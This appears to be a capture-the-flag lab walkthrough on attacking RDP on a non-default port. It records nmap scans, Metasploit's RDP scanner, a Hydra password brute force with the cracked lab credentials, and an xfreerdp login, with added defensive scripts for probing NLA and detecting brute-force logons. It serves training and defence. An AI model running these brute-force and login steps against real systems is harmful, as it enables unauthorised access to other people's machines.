Exploiting RDP
The Remote Desktop Protocol (RDP) is a proprietary GUI remote-access protocol developed by Microsoft for connecting to and interacting with Windows systems remotely.
RDP listens on TCP port 3389 by default, but it can be configured to run on any other TCP port.
RDP authentication requires a legitimate user account on the target system together with that user's password in cleartext.
We can run an RDP brute-force attack to identify valid user credentials, which can then be used to access the target system remotely.
Demo: Exploiting RDP
```
Target IP Address: 10.2.24.86
```
This particular port is not assigned to any well-known service, and RDP can be configured to run on a port other than the default 3389.
```
nmap -sV -O 10.2.24.86
nmap -sV -p- 10.2.24.86
nmap -sV 10.2.24.86
```
How do you check a port and determine whether or not it is running RDP? One technique is to connect to the target system and specify this particular port as the RDP port.
Another really helpful tool is the Metasploit RDP scanner module, which tells you whether a given port is running RDP.
Identify endpoints speaking the Remote Desktop Protocol (RDP)
This module attempts to connect to the specified Remote Desktop Protocol port and determines whether it speaks RDP. When available, the Credential Security Support Provider (CredSSP) protocol is used to identify the Windows version running the server. Enabling the DETECT_NLA option causes a second connection to be made to the server to determine whether Network Level Authentication (NLA) is required.
```
service postgresql start && msfconsole
search rdp_scanner
use auxiliary/scanner/rdp/rdp_scanner
show options
set RHOSTS 10.2.24.86
set RPORT 3333
run
```
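To make the module description concrete, here is an added example (not code from the original post or from Metasploit) of what an "is this port RDP?" check and the DETECT_NLA option do on the wire: a TPKT/X.224 Connection Request carrying an RDP_NEG_REQ is sent, and the server's Connection Confirm is parsed for an RDP_NEG_RSP (selected security protocol) or RDP_NEG_FAILURE. Offering only legacy RDP security to a server that enforces NLA yields the failure code HYBRID_REQUIRED_BY_SERVER, which is how "Requires NLA" is decided. The sample responses in the block are constructed, not captured; the `probe()` helper is for inventorying hosts you are responsible for, to find RDP exposed on non-standard ports and confirm NLA is enforced.

```python
"""
RDP negotiation probe (added example, not from the original post or from
Metasploit). Message layouts and constants follow MS-RDPBCGR 2.2.1.1/2.2.1.2.
"""
import socket
import struct
import sys

# RDP_NEG_REQ.requestedProtocols / RDP_NEG_RSP.selectedProtocol flag values
PROTOCOL_RDP = 0x00000000      # legacy "standard RDP security" (no TLS)
PROTOCOL_SSL = 0x00000001      # TLS
PROTOCOL_HYBRID = 0x00000002   # CredSSP, i.e. Network Level Authentication
PROTOCOL_HYBRID_EX = 0x00000008

TYPE_RDP_NEG_REQ = 0x01
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03
HYBRID_REQUIRED_BY_SERVER = 0x05   # failureCode meaning "NLA is mandatory"

X224_CONNECTION_REQUEST = 0xE0
X224_CONNECTION_CONFIRM = 0xD0


def build_connection_request(requested_protocols):
    """TPKT header + X.224 Connection Request carrying an RDP_NEG_REQ."""
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    # After the length indicator: CR code, DST-REF(2), SRC-REF(2), class 0, payload
    tpdu_body = bytes([X224_CONNECTION_REQUEST]) + b"\x00\x00\x00\x00\x00" + neg_req
    x224 = bytes([len(tpdu_body)]) + tpdu_body      # LI counts the bytes after itself
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


def parse_connection_confirm(data):
    """Decode the server's X.224 Connection Confirm and its RDP_NEG_* payload."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT-framed response")
    li = data[4]
    if data[5] != X224_CONNECTION_CONFIRM:
        raise ValueError("not an X.224 Connection Confirm")
    payload = data[11:5 + li]
    if not payload:
        # Pre-negotiation servers answer with a bare CC: standard RDP security
        return {"type": "plain", "selected_protocol": PROTOCOL_RDP, "failure_code": None}
    ptype, _flags, plen, value = struct.unpack("<BBHI", payload[:8])
    if plen != 8:
        raise ValueError("unexpected RDP_NEG structure length %d" % plen)
    if ptype == TYPE_RDP_NEG_RSP:
        return {"type": "rsp", "selected_protocol": value, "failure_code": None}
    if ptype == TYPE_RDP_NEG_FAILURE:
        return {"type": "failure", "selected_protocol": None, "failure_code": value}
    raise ValueError("unknown RDP_NEG type 0x%02x" % ptype)


def nla_required(answer_to_rdp_only_request):
    """DETECT_NLA logic: offer only legacy RDP security; a server that
    enforces NLA refuses with HYBRID_REQUIRED_BY_SERVER."""
    return (answer_to_rdp_only_request["type"] == "failure"
            and answer_to_rdp_only_request["failure_code"] == HYBRID_REQUIRED_BY_SERVER)


def exchange(host, port, requested_protocols, timeout=5.0):
    """One request/confirm round trip against a host you are allowed to audit."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request(requested_protocols))
        return parse_connection_confirm(sock.recv(1024))


def probe(host, port):
    """Report whether host:port speaks RDP and whether NLA is enforced."""
    try:
        first = exchange(host, port, PROTOCOL_SSL | PROTOCOL_HYBRID)
    except (OSError, ValueError):
        return {"rdp": False, "selected_protocol": None, "nla_required": None}
    try:
        nla = nla_required(exchange(host, port, PROTOCOL_RDP))
    except (OSError, ValueError):
        nla = None
    return {"rdp": True, "selected_protocol": first["selected_protocol"], "nla_required": nla}


# Constructed sample confirms (not captured from a real server):
# TPKT(19) + LI=14 + CC + refs + class, then RDP_NEG_RSP selecting HYBRID
SAMPLE_RSP_HYBRID = (b"\x03\x00\x00\x13\x0e\xd0\x00\x00\x12\x34\x00"
                     + struct.pack("<BBHI", TYPE_RDP_NEG_RSP, 0, 8, PROTOCOL_HYBRID))
# Same framing, but RDP_NEG_FAILURE with HYBRID_REQUIRED_BY_SERVER
SAMPLE_FAILURE_NLA = (b"\x03\x00\x00\x13\x0e\xd0\x00\x00\x12\x34\x00"
                      + struct.pack("<BBHI", TYPE_RDP_NEG_FAILURE, 0, 8, HYBRID_REQUIRED_BY_SERVER))
# Bare Connection Confirm (11 bytes, LI=6): no negotiation payload at all
SAMPLE_PLAIN_CC = b"\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00"

if __name__ == "__main__":
    for name, sample in (("hybrid", SAMPLE_RSP_HYBRID), ("nla-failure", SAMPLE_FAILURE_NLA),
                         ("plain", SAMPLE_PLAIN_CC)):
        print(name, parse_connection_confirm(sample))
    if len(sys.argv) == 3:      # e.g. python3 rdp_probe.py <host> <port>
        print(probe(sys.argv[1], int(sys.argv[2])))
```

The nmap output later on this page labels port 3333 as `ssl/dec-notes?`, which is what service fingerprinting looks like when RDP sits on a non-default port; a negotiation-level check such as this one (or the rdp_scanner module) is what actually identifies it. A `nla_required` value of `False` on your own host is the finding to act on, since without NLA the server exposes its full logon screen to unauthenticated clients.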
However, we can't authenticate to the target system over RDP yet because we don't have any credentials, so the next step is to brute-force RDP.
Relevant hydra options:
-s PORT: if the service is on a different default port, define it here
-t TASKS: run TASKS number of connects in parallel per target (default: 16)
```
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.2.24.86 -s 3333
```
```
xfreerdp [file] [options] [/v:<server>[:port]]
/option:<value> (specifies option with value)
/p:<password> Password
/u:[[<domain>\]<user>|<user>[@<domain>]] Username
/v:<server>[:port] Server hostname
Examples:
xfreerdp connection.rdp /p:Pwd123! /f
xfreerdp /u:CONTOSO\JohnDoe /p:Pwd123! /v:rdp.contoso.com
xfreerdp /u:JohnDoe /p:Pwd123! /w:1366 /h:768 /v:192.168.1.100:4489
xfreerdp /u:JohnDoe /p:Pwd123! /vmconnect:C824F53E-95D2-46C6-9A18-23A5BB403532 /v:192.168.1.100
```
```
xfreerdp /u:administrator /p:qwertyuiop /v:10.2.24.86:3333
```
Windows: Insecure RDP Service
Overview
You are given a Kali GUI machine and a target machine running a vulnerable RDP service. The target machine's IP address is provided in a text file named target on the Kali machine's desktop (/root/Desktop/target).
Your task is to fingerprint the running RDP service and its valid port using the tools available on the Kali machine, then exploit the vulnerability using the appropriate method.
Note: rdesktop does not work with this setup because it does not support NLA. Please use xfreerdp to connect to the RDP server.
Objective: Exploit the application and retrieve the flag!
Instructions:
- Your Kali machine has an interface with IP address 10.10.X.Y; run "ip addr" to find the values of X and Y.
- The target machine's IP address is given in the file "/root/Desktop/target".
- Do not attack the gateways at IP addresses 192.V.W.1 and 10.10.X.1.
- Wordlists to use:
/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
My own approach
```
Target IP Address : 10.0.16.124
```
```
root@attackdefense:~# nmap -sV 10.0.16.124
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-15 08:26 IST
Nmap scan report for 10.0.16.124
Host is up (0.0030s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp open ssl/dec-notes?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.45 seconds
```
```
root@attackdefense:~# nmap -sV -p- -O 10.0.16.124
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-15 08:31 IST
Stats: 0:02:18 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.0.16.124
Host is up (0.0030s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp open ssl/dec-notes?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49164/tcp open msrpc Microsoft Windows RPC
49178/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=9/15%OT=135%CT=1%CU=34927%PV=Y%DS=3%DC=I%G=Y%TM=632296
OS:17%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M546NW8ST11%O2=M546NW8ST11%O3=M546NW8NNT11%O4=M546NW8ST11%O5=M5
OS:46NW8ST11%O6=M546ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=7F%W=2000%O=M546NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=7F%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=7F%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=7F%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=7F%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=7F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=7F%CD=Z)
Network Distance: 3 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.93 seconds
```
Identify endpoints speaking the Remote Desktop Protocol (RDP)
```
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
10.0.16.124
msf5 > use auxiliary/scanner/rdp/rdp_scanner
msf5 auxiliary(scanner/rdp/rdp_scanner) > show options
Module options (auxiliary/scanner/rdp/rdp_scanner):
Name Current Setting Required Description
---- --------------- -------- -----------
DETECT_NLA true yes Detect Network Level Authentication (NLA)
RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME rdesktop no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3389 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/rdp/rdp_scanner) > set rhosts 10.0.16.124
rhosts => 10.0.16.124
msf5 auxiliary(scanner/rdp/rdp_scanner) > set rport 3333
rport => 3333
msf5 auxiliary(scanner/rdp/rdp_scanner) > run
[*] 10.0.16.124:3333 - Detected RDP on 10.0.16.124:3333 (Windows version: 6.3.9600) (Requires NLA: Yes)
[*] 10.0.16.124:3333 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```
root@attackdefense:~# hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.0.16.124 -s 3333 -t 4
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-15 08:55:26
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 7063 login tries (l:7/p:1009), ~1766 tries per task
[DATA] attacking rdp://10.0.16.124:3333/
[3333][rdp] host: 10.0.16.124 login: sysadmin password: samantha
[ERROR] freerdp: The connection failed to establish.
[3333][rdp] host: 10.0.16.124 login: demo password: victoria
[ERROR] freerdp: The connection failed to establish.
[3333][rdp] host: 10.0.16.124 login: auditor password: elizabeth
[ERROR] freerdp: The connection failed to establish.
[3333][rdp] host: 10.0.16.124 login: administrator password: qwertyuiop
[ERROR] freerdp: The connection failed to establish.
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-15 08:56:09
```
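Seen from the server side, a run like the one above produces a burst of failed logons from one source across several accounts in well under a minute, followed a few minutes later by a successful logon for one of them. The following added example (not code from the original post or from Hydra) shows the detection logic for that pattern over constructed sample records (not real logs) shaped like the fields of Windows Security Event ID 4625 ("An account failed to log on") and 4624 (successful logon): a source whose failures reach a threshold inside a sliding window is flagged, and escalated if it then logs on successfully. One caveat worth building in: when NLA is enforced, failed RDP logons are usually recorded with logon type 3 (network) rather than 10 (RemoteInteractive), and some 4625 records carry "-" as the source address, so the rule must not filter on logon type 10 and falls back to keying on the target account when no source IP is present.

```python
"""
RDP brute-force detection over Security-log-shaped records (added example,
not from the original post or from Hydra). Sample records are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime

# (timestamp, EventID, TargetUserName, LogonType, IpAddress) - constructed sample data
SAMPLE_EVENTS = [
    ("2022-09-15T08:30:00", 4625, "alice", 10, "10.0.16.7"),          # benign typo
    ("2022-09-15T08:31:10", 4625, "alice", 10, "10.0.16.7"),
    ("2022-09-15T08:31:15", 4624, "alice", 10, "10.0.16.7"),
    ("2022-09-15T08:55:27", 4625, "sysadmin", 3, "10.0.16.5"),        # burst begins
    ("2022-09-15T08:55:29", 4625, "demo", 3, "10.0.16.5"),
    ("2022-09-15T08:55:31", 4625, "auditor", 3, "10.0.16.5"),
    ("2022-09-15T08:55:33", 4625, "administrator", 3, "10.0.16.5"),
    ("2022-09-15T08:55:35", 4625, "sysadmin", 3, "10.0.16.5"),
    ("2022-09-15T08:55:37", 4625, "demo", 3, "10.0.16.5"),
    ("2022-09-15T08:55:39", 4625, "auditor", 3, "10.0.16.5"),
    ("2022-09-15T08:55:41", 4625, "administrator", 3, "10.0.16.5"),
    ("2022-09-15T08:55:45", 4625, "auditor", 3, "-"),                 # NLA caveat: no source IP
    ("2022-09-15T09:04:26", 4624, "administrator", 10, "10.0.16.5"),  # interactive logon follows
]


def event_key(user, ip):
    """Group by source address; fall back to the target account when absent."""
    return ip if ip and ip != "-" else "user:" + user


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Return {key: {"failures", "users", "success_after"}} for every key whose
    4625 count within some window of window_seconds reaches threshold."""
    recent = defaultdict(deque)      # key -> failure timestamps inside the window
    users = defaultdict(set)         # key -> accounts that were targeted
    alerts = {}
    for ts, event_id, user, _logon_type, ip in sorted(events, key=lambda e: e[0]):
        t = datetime.fromisoformat(ts)
        key = event_key(user, ip)
        if event_id == 4625:
            q = recent[key]
            q.append(t)
            users[key].add(user)
            while (t - q[0]).total_seconds() > window_seconds:   # slide the window
                q.popleft()
            if len(q) >= threshold:
                entry = alerts.setdefault(key, {"failures": 0, "users": [], "success_after": None})
                entry["failures"] = max(entry["failures"], len(q))
                entry["users"] = sorted(users[key])
        elif event_id == 4624 and key in alerts and alerts[key]["success_after"] is None:
            # A logon from a source that just failed repeatedly: a password was likely guessed
            alerts[key]["success_after"] = (user, ts)
    return alerts


def severity(alert):
    """Rank an alert: a success after the burst is the strongest signal."""
    if alert["success_after"]:
        return "critical"
    return "high" if len(alert["users"]) > 1 else "medium"


if __name__ == "__main__":
    for key, alert in detect_bruteforce(SAMPLE_EVENTS).items():
        print(severity(alert), key, alert)
```

With the sample data, only 10.0.16.5 is flagged (eight failures across four accounts in fourteen seconds, then a successful administrator logon), while the two mistyped passwords from 10.0.16.7 stay below the threshold. On the prevention side, the same burst is what an account lockout policy and restricting RDP to a VPN or jump host are meant to stop; moving the service to port 3333, as on this target, hides it from a quick scan but not from a negotiation-level check or from a password guess.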
```
xfreerdp /u:administrator /p:qwertyuiop /v:10.0.16.124:3333
```
```
root@attackdefense:~# xfreerdp /u:administrator /p:qwertyuiop /v:10.0.16.124:3333
[09:04:26:668] [177980:177981] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - @ WARNING: CERTIFICATE NAME MISMATCH! @
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - The hostname used for this connection (10.0.16.124:3333)
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - Common Name (CN):
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - WIN-OMCNBKR66MN
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 10.0.16.124:3333 (RDP-Server):
Common Name: WIN-OMCNBKR66MN
Subject: CN = WIN-OMCNBKR66MN
Issuer: CN = WIN-OMCNBKR66MN
Thumbprint: 81:80:6a:ce:02:6f:0b:ca:67:da:6c:33:13:83:bf:b3:a6:53:a3:12
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) y
```
We log in as Administrator and find flag.txt in C:\ with the following content:
```
port-number-3333
```
Solution
The solution for this lab is available in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1957.pdf